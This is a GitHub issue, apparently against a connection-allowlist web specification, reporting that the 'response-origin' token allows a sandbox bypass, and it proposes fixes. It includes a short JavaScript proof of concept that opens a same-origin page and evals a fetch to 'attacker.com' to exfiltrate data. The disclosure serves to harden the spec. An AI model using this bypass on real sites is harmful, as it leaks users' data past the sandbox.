Skip to content

response-origin token allows for connection sandbox bypass. #15

Description

@terjanq

As I currently see the specification, allowing the response-origin looks benign and doesn't seem to pose security implications at first sight. This is far from truth though as response-origin enables trivial exfiltration vectors from same-origin navigations to a non-sandboxed endpoint.

To demonstrate the issue:

// Similar can be done with iframes
var win = open('/unprotected-404-error-page-this-would-probably-point-to');
setTimeout(()=>{
  win.eval("fetch('//attacker.com?exfil=123')");
}, 1000)

One solution could be to propagate the network sandbox on same-origin requests, but then a similar issue could be stemming if CSP was needed in addition to the Connection Allowlist to create an effective sandbox.

Another solution would be to limit the default list of URLs to be strictly an allowlist of non-navigational requests, and to allow a navigation it needs to be enabled separately through the already proposed allow-navigation=, while clearly noting that same-origin navigations could lead to a complete connection sandbox bypass.

Metadata

Metadata

Assignees

No one assigned

    Labels

    enhancementNew feature or request

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions